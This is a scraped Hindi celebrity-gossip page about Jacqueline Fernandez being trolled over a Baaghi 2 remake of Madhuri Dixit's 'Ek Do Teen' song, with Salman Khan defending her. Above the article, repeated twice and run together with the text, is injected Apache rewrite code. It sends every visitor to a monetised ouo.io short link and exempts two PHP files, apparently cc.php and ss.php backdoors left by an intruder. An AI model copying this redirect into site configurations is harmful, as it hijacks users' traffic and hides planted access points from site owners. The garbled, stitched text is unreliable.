
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 342
Nextमुंबई। हाल ही में बागी 2 का गाना रिलीज हुआ है। इस गाने में जैकलीन फर्नांडीज माधुरी दीक्षित के गाने एक दो तीन पर थिरकती नजर आएंगी। लेकिन जब दर्शकों ने इस गाने को देखा तो उन्हें इस गाने में फूहड़ता के अलावा और कुछ नजर नहीं आया। जैकलीन का इस्तेमाल डांस के लिए कम और आदमियों का ध्यान खींचने के लिए ज़्यादा किया गया। ऐसे में फैन्स भड़क गए और जैकलीन फर्नांडीज़ को जमकर ट्रोल किया जाने लगा। जैकलीन फर्नांडीज़ ने समर्थन के लिए माधुरी दीक्षित को मेसेज किया और उनसे गाने के बारे में अपनी राय देने को कहा लेकिन माधुरी दीक्षित ने जैकलीन के मेसेज को पूरी तरह इग्नोर कर दिया है और कोई जवाब नहीं दिया है। ओरिजिनल गाना तेज़ाब फिल्म का है जिसके निर्देशक ने इस गाने को सेक्स को बढ़ावा देने वाला आईटम नंबर करार दिया है। वहीं सरोज खान ने तो इस पर चुप्पी ही साध ली है। हालांकि जैकलीन का समर्थन करने के लिए खुद सलमान खान उतर आए हैं। उन्होंने ट्वीट करते हुए लिखा कि सरोज खान और माधुरी दीक्षित को मैच कर पाना तो वाकई काफी मुश्किल है लेकिन जैकलीन ने इस गाने को पूरी तरह निभाया है।